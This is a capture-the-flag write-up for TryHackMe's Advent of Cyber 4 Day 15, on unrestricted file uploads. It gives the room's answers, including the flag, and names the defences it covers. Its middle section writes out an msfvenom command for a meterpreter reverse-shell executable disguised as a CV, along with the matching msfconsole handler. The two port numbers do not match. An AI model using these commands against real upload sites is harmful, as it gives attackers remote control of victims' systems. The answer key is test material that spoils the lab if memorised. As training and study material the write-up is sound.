-
Notifications
You must be signed in to change notification settings - Fork 1
Writeup: Advent of Cyber 4 Day 15
Link: Advent Of Cyber 4 on TryHackMe
What is the name given to file uploads that allow threat actors to upload any files that they want?
Answer: Unrestricted
What is the title of the web application developed by Santa's freelancer?
Answer: SantaSideKick2
What is the value of the flag stored in the HR Elf's Documents directory?
We start by using msfvenom
to create a malicious executable: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT="4321" -f exe -o cv-maya.exe
We then tell the shell to create a reverse shell handler, with automatic meterpreter elevation:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST $IP; set LPORT '4231'; exploit"
We then upload our "CV" to the platform:
The "CV" gets executed, leading us to a meterpreter session:
We situate ourselves and then navigate to the target directory to get the flag:
Answer: THM{Naughty.File.Uploads.Can.Get.You.RCE}
What defence technique can be implemented to ensure that specific file types can be uploaded?
Answer: File Extension Validation
What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?
Answer: File Renaming
What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?
Answer: Malware Scanning